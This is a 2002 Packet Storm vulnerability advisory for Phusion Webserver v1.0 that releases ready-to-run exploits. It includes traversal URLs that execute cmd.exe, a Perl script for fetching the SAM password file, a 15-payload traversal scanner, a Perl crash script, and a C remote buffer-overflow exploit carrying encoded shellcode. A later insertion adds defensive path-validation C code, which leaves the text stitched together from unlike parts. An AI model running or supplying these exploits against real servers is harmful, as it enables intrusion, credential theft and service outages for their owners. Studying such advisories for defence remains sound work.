Phusion-web.txt

2002-02-19T00:00:00
ID PACKETSTORM:25774
Type packetstorm
Reporter Alex Hernandez
Modified 2002-02-19T00:00:00

Description

                                        
------oOo----------------
Phusion Webserver Directory Traversal, DoS Vulnerabilities
and BufferOverrun (Exploit Codes Released).
------oOo----------------
  
Phusion Webserver for Windows 9x/NT/2000 contains remote vulnerabilities
which allow users to see and retrieve any file on the server.
Exploit information included.
  
  
Company Affected: www.BBShareware.com
Version: v1.0
Download: http://www.bbshareware.com/phusion/
Size: 1.99 KB
OS Affected: Windows ALL.
  
Author:  
  
** Alex Hernandez <al3xhernandez@ureach.com>  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins   
** G.Maggiotti & H.Oliveira.  
  
----=[Brief Description]=------------  
  
Phusion Webserver is a webserver for Windows 9x/NT/2000.
A bug allows any user to change to any directory, list the files
in that path and also GET files remotely. A BufferOverrun also
exists, through which you can run arbitrary code on the server.
  
----=[Summary]=----------------------  
  
From the developer: "Phusion can be set up so that friends, family,
clients, or co-workers can log in to your computer, safely and securely
from any internet connected computer in the world. No setup fees,
no startup fees, no waiting, simply download and install Phusion,
activate it, and your computer becomes a web site. You can pick the
files and directories you want to share, and feel safe knowing that's
all the users can access with Phusion's secure technology". <-- haha.
  
  
Three vulnerabilities exist:

a) Directory Traversal. (Exploits Released)
b) Denial Of Service. (Exploits Released)
c) BufferOverrun. (Exploits Released)
  
  
------oOo--------  
  
Proof Of concept  
  
The vulnerability is triggered by a specially crafted URL made of
triple-dot ".../" directory traversal sequences; URL-encoded
representations of "/" and "\" can be substituted for the literal
separators.
  
Example:  
  
http://www.example.com/.../.../.../.../test.txt  
  
sh-2.04# nc -vvn 10.0.0.1 80  
(UNKNOWN) [10.0.0.1] 80 (?) open  
GET /.../.../.../.../test.txt HTTP /1.0  
  
  
HAVE Fun! , i seen this file remote ;-)  
  
/Alex Hernandez!  
  
sent 41, rcvd 70  
sh-2.04#  
  
  
DoS

Example:
The server crashes after it is sent a very long URL:

http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA

sh-2.04# nc -vvn 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (?) open
GET /cgi-bin/.../.../.../.../ HTTP/1.0

sent 42, rcvd 0
sh-2.04#

The server crashes and the administrator has to restart the service!
  
  
Exploits:
You can test your own IIS system with the following URLs:
http://10.0.0.1/scripts/..%c0%af (which translates to '/')
Or
http://10.0.0.1/scripts/..%c1%9c (which translates to '\')
Or (for the execution bug)
http://10.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
Or
http://10.0.0.1/.../.../.../.../winnt/system32/cmd.exe?/c+dir+c:\


NOTE: THE PATH DEPENDS ON WHERE THE SOFTWARE IS INSTALLED.
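The three findings above share one server-side root cause: the request path is copied into a fixed-size buffer and handed to the file system without a length limit and without being canonicalised first. The C below is an added example written for this page; it is not Phusion's code and not from the vendor, and the names safe_path(), check_repeated(), MAX_PATH_LEN and the error codes are assumptions. It checks the length before anything else (so a 2500-byte request line never reaches a fixed buffer), decodes percent escapes strictly (rejecting encoded separators, overlong UTF-8 forms such as %c0%af and %c1%9c, and malformed escapes), and then resolves dot segments, rejecting the ".../" form outright and any ".." that would climb above the document root. Both '/' and '\' are treated as separators because the target is a Windows file system.

```c
/* Added example for this page, not Phusion's code: request-path validation a
 * small HTTP server should do before it touches the file system. The names
 * safe_path(), check_repeated(), MAX_PATH_LEN and the error codes are assumed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_PATH_LEN 1024   /* assumed cap on the request path, in bytes */

enum path_err { PATH_OK = 0, PATH_TOO_LONG, PATH_BAD_ENCODING,
                PATH_BAD_BYTE, PATH_TRAVERSAL, PATH_OUTPUT_FULL };

static int hexval(int c) { return isxdigit(c) ? (isdigit(c) ? c - '0' : tolower(c) - 'a' + 10) : -1; }

/* Strict %XX decoding. A decoded '/', '\\', NUL, control byte or byte >= 0x80 is
 * rejected (covers %2f, %5c and overlong UTF-8 such as %c0%af and %c1%9c). */
static enum path_err decode_path(const char *raw, char *dst, size_t dstlen) {
    size_t o = 0;
    for (size_t i = 0; raw[i] != '\0'; i++) {
        unsigned char c = (unsigned char)raw[i];
        if (c == '%') {
            int hi = hexval((unsigned char)raw[i + 1]);
            int lo = (hi < 0) ? -1 : hexval((unsigned char)raw[i + 2]);
            if (hi < 0 || lo < 0) return PATH_BAD_ENCODING;   /* e.g. "%zz" */
            c = (unsigned char)(hi * 16 + lo);
            i += 2;
            if (c == '/' || c == '\\') return PATH_BAD_BYTE;  /* encoded separator */
        }
        if (c == '\0' || c >= 0x80 || !isprint(c)) return PATH_BAD_BYTE;
        if (o + 1 >= dstlen) return PATH_OUTPUT_FULL;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return PATH_OK;
}

/* Split on '/' and '\\' (Windows accepts both) and resolve dot segments: "." is
 * dropped, ".." pops one segment but never above the root, and three or more
 * dots (the ".../" form used against Phusion) is rejected rather than guessed. */
static enum path_err normalize_path(const char *p, char *out, size_t outlen) {
    size_t o = 0;                                  /* out holds "/seg/seg" so far */
    while (*p != '\0') {
        while (*p == '/' || *p == '\\') p++;
        if (*p == '\0') break;
        const char *start = p;
        while (*p != '\0' && *p != '/' && *p != '\\') p++;
        size_t len = (size_t)(p - start);
        if (strspn(start, ".") == len) {           /* segment is all dots */
            if (len == 1) continue;
            if (len > 2 || o == 0) return PATH_TRAVERSAL;
            while (out[--o] != '/') ;              /* ".." : drop "/lastseg" */
            continue;
        }
        if (o + len + 2 > outlen) return PATH_OUTPUT_FULL;
        out[o++] = '/';
        memcpy(out + o, start, len);
        o += len;
    }
    if (o == 0) { if (outlen < 2) return PATH_OUTPUT_FULL; out[o++] = '/'; }
    out[o] = '\0';
    return PATH_OK;
}

/* Length first, so the 2500-byte request line that crashes Phusion never
 * reaches a fixed buffer; then strict decoding; then normalisation. */
enum path_err safe_path(const char *raw, char *out, size_t outlen) {
    char decoded[MAX_PATH_LEN + 1];
    size_t len = 0;
    while (len <= MAX_PATH_LEN && raw[len] != '\0') len++;
    if (len > MAX_PATH_LEN) return PATH_TOO_LONG;
    enum path_err e = decode_path(raw, decoded, sizeof decoded);
    return e != PATH_OK ? e : normalize_path(decoded, out, outlen);
}

/* "/cgi-bin/" followed by n copies of c: the shape of the page's DoS request. */
enum path_err check_repeated(char c, size_t n) {
    static char buf[8192];                        /* assumed cap, > any n used */
    char out[MAX_PATH_LEN + 1];
    if (n > sizeof buf - 10) n = sizeof buf - 10;
    memcpy(buf, "/cgi-bin/", 9);
    memset(buf + 9, c, n);
    buf[9 + n] = '\0';
    return safe_path(buf, out, sizeof out);
}

int main(void) {
    const char *samples[] = {                     /* constructed from the page */
        "/.../.../.../.../test.txt",                  /* Phusion triple dot */
        "/scripts/..%c0%af../winnt/system32/cmd.exe", /* overlong UTF-8 '/' */
        "/docs/..%5c..%5cboot.ini",                   /* encoded backslash  */
        "/a/b/../c/readme.txt",                       /* harmless ".."      */
    };
    char out[MAX_PATH_LEN + 1];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        enum path_err e = safe_path(samples[i], out, sizeof out);
        printf("%-46s -> %s\n", samples[i], e == PATH_OK ? out : "REJECTED");
    }
    printf("/cgi-bin/ + 3000 x 'A' -> %s\n", check_repeated('A', 3000) == PATH_OK ? "ok" : "REJECTED");
    return 0;
}
```

Compile with gcc and run it: each request form from this page is either rejected or reduced to a canonical "/a/b" path, and only the output of safe_path() joined to the document root ever reaches the file system. A raw backslash is accepted as a separator, but a percent-encoded one is refused, because an encoded separator has no legitimate use in a path and is the usual way of smuggling traversal past a check that runs before decoding.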
  
  
------oOo------------------------  
Exploit Code GET files Phusion-GET.pl  
------oOo------------------------  
  
#!/usr/bin/perl
#
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN
#
# Simple script to get files from the server.
#
# Maybe you need this line for windows:
# #! c:\perl\bin\perl.exe
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion-GET.pl <and read the instructions>
#
#
  
  
print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");


print <<"EOT";
Please type the address of the remote webserver, example: www.whitehouse.gov
[Default remote Webserver is "127.0.0.1"]:
EOT
# chomp() the answers: the original read "<>" without it, so the trailing
# newline made every answer true and the defaults were never applied.
chomp($host = <STDIN>);
$host = "127.0.0.1" if $host eq "";

print <<"EOT";
Please type only the directory where the file you want to download is
located, example: /winnt/repair/
[default directory is "/winnt/repair/"] :#For IIS 4-5
EOT
chomp($directory = <STDIN>);
$directory = "/winnt/repair/" if $directory eq "";


print <<"EOT";
Please type the filename you want to download, example: sam._
[default file is "sam._"] :
EOT
chomp($file = <STDIN>);
$file = "sam._" if $file eq "";

# Maybe you need to change this line depending on the installation PATH.
# The browser is handed the traversal URL and shows the retrieved file.
system("explorer.exe", "http://$host:80/../../..$directory$file");

print <<"EOT";
HAVE Fun!. ;-)
EOT
  
  
  
------oOo------------------------  
Exploit Code Traversal Phusion_exp.pl  
------oOo------------------------  
  
#!/usr/bin/perl
#
# Simple script to identify whether the host is vulnerable.
#
# This does 15 different checks based on the IIS 4-5 encodings. Have Fun!
#
# Phusion Webserver v1.0 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion_exp.pl <Host>:<Port>
#
# Example:
#
# perl -x Phusion_exp.pl www.whitehouse.com:80
# Trying.....................
#
# <THIS HOST IS VULNERABLE> :-)
# Check the previous notes to execute bugs.
#
#
  
use Socket;

if ($#ARGV < 0) { die "
\nPhusion Webserver v1.0 traversal exploit(c)2002.
Alex Hernandez al3xhernandez\@ureach.com\n

Usage: perl -x $0 www.whitehouse.com:80 {OR}\n
[if the host is not using a proxy]\n
Usage: perl -x $0 127.0.0.1:80\n\n"; }

($host, $port) = split(/:/, $ARGV[0]);   # was @ARGV[0], a one-element slice
$port ||= 80;
print "Trying.....................\n";
$target = inet_aton($host) || die("Can't resolve $host\n");
$flag = 0;

# The 15 test methods: 14 IIS 4/5 style encoded-traversal requests and, as
# method 15, the ".../" form that Phusion itself decodes. The paths are the
# original ones, unchanged; each is now sent as a single request line (the
# original split "GET", the path and "HTTP/1.0" over three lines, which is
# not a valid request).
@paths = (
    '/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir',
    '/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir',
    '/.../.../.../.../winnt/system32/cmd.exe?/c+dir',
);

$method = 0;
foreach $path (@paths) {
    $method++;
    # ---------------test method $method
    my @results = sendraw("GET $path HTTP/1.0\r\n\r\n");
    foreach $line (@results) {
        # a "Directory of ..." listing in the response means cmd.exe ran
        if ($line =~ /Directory/) { $flag = 1; }
    }
}

#------------------------------
if ($flag == 1) { print "<THIS HOST IS VULNERABLE> :-)\n
Check the previous notes to execute bugs\n"; }
else { print "<THIS HOST IS NOT VULNERABLE> :-( \n
Check manually on browser...\n"; }


sub sendraw {
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
        die("Socket problems\n");
    # sockaddr_in() replaces the original hand-packed "SnA4x8" address
    if (connect(S, sockaddr_in($port, $target))) {
        my @in;
        select(S); $| = 1; print $pstr;
        while (<S>) { push @in, $_; }
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect check the port or address...\n"); }
}
  
  
  
------oOo-------------  
Exploit Code DoS Phusion_DoS.pl  
------oOo-------------  
  
#!/usr/bin/perl
#
# Simple script to send a long string of 'A's to the server,
# resulting in the server crashing.
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion_DoS.pl -s <server>
#
# Example:
#
# perl -x Phusion_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#
  
use Getopt::Std;
use Socket;

print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if (!defined($args{s})) { &usage; }

$def  = "A";
$num  = 3000;
$data = $def x $num;        # 3000 'A's, more than the ~2500 that crash v1.0
$serv = $args{s};
$port = 80;
# One over-long request line. The original read "/HTTP/1.0", which is not a
# valid request line; the version token now follows a space.
$buf  = "GET /cgi-bin/$data HTTP/1.0\r\n\r\n";


$in_addr = (gethostbyname($serv))[4] || die("Error: cannot resolve $serv\n");
$paddr   = sockaddr_in($port, $in_addr);
$proto   = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) || die("Error: $!");
select(S); $| = 1; select(STDOUT);
print S $buf;
close(S);


# The script does not check the server afterwards; this message is unconditional.
print("\nCrash was successful !\n\n");

sub usage { die("\n\nUsage: perl -x $0 -s <server>\n\n"); }
  
  
  
------oOo------------------------  
Exploit Code BufferOverrun Phusion-ovrun.c  
------oOo------------------------  
  
/** Phusion-ovrun.c
** -Remote exploit for Phusion Webserver v1.0 for WinNT.
**
** Phusion Webserver v1.0 exploit gets full control of the remote server.
** When you attack a vulnerable server you can run arbitrary code
** on it.
**
** Phusion Webserver v1.0 proof-of-concept exploit.
** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
**
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
** G.Maggiotti & H.Oliveira.
**
**
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c
**
** Usage: ./Phusion-ovrun <hostname>
**
**
**
**
**/
  
  
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* memcpy() */
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
  
#define _PORT 80  
#define _X 10000  
  
char runcrash[] =  
"GET /"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"  
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"  
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"  
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"  
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"  
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"  
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"  
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"  
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"  
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"  
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"  
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"  
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"  
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"  
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"  
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"  
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"  
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"  
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"  
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"  
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"  
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"  
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"  
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"  
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"  
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"  
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"  
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"  
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"  
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"  
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"  
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"  
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"  
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"  
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"  
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"  
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"  
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"  
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"  
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"  
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"  
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"  
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";  
  
  
int sock;
struct sockaddr_in sock_a;
struct hostent *host;

int main (int argc, char *argv[]) {

    printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n");
    printf("Alex Hernandez al3xhernandez@ureach.com\n\n");

    if(argc < 2) {
        fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
        exit(0);
    }

    if((host=gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");    /* gethostbyname() reports via h_errno, not errno */
        exit(-1);
    }

    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("create socket");
        exit(-1);
    }

    sock_a.sin_family=AF_INET;
    sock_a.sin_port=htons(_PORT);
    memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
    if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
        perror("connect");
        exit(-1);
    }

    fflush(stdout);

    /* Send the request (NOP sled, shellcode and return address) as far as
     * the string goes. The original wrote _X (10000) bytes from runcrash,
     * which is much shorter than that, so the rest came from whatever
     * followed the array in memory (an out-of-bounds read). */
    write(sock,runcrash,sizeof(runcrash)-1);
    write(sock,"\n\n", 2);
    close(sock);
    printf("done.\n\n");

    return 0;
}
  
  
  
  
------oOo------------------------------------
Vendor Response:
The vendor was notified:
support@bbshareware.com
http://www.BBShareware.com
Temporary patch: no data from the vendor.

Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.

------oOo------------------------------------